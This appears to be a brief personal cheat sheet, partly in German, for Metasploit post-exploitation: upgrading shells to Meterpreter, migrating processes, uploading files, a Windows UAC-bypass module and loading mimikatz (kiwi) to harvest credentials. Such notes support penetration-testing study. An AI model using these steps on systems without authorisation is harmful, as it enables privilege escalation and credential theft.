Metasploit

First Steps

Initialize Database

msfdb init

start metasploit

msfconsole

check if connected to database

db_status

Backgroud a Shell session

[ctrl + z]

oder

background

Nachdem ein exploit ausgewählt worden ist kann man sich die kompatiblen payloads anzeigen lassen

show payloads

Upgrade Command Shell to Meterpreter

sessions -u <session-number>
use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit

Migriere zu einem anderen Prozess

Bloss weil man genügend Rechte besitzt, heisst es nicht, dass der Prozess auf dem man sich befindet ebenfalls genügend Rechte hat. Ebenfalls kann man zu einem Stabileren Prozess wechseln.

ps        #Liste alle Prozesse
migrate <Process-ID>

File Uploaden

Es ist direkt möglich von Meterpreter ein File upzuloaden

meterpreter > upload <filename>

Local exploits

Bei diesen exploits muss eine bereits bestehende Session angegeben werden. Ein beispiel Exploit wäre:

use exploit/windows/local/bypassuac_eventvwr

mimikatz laden in meterpreter

meterpreter> load kiwi

Last updated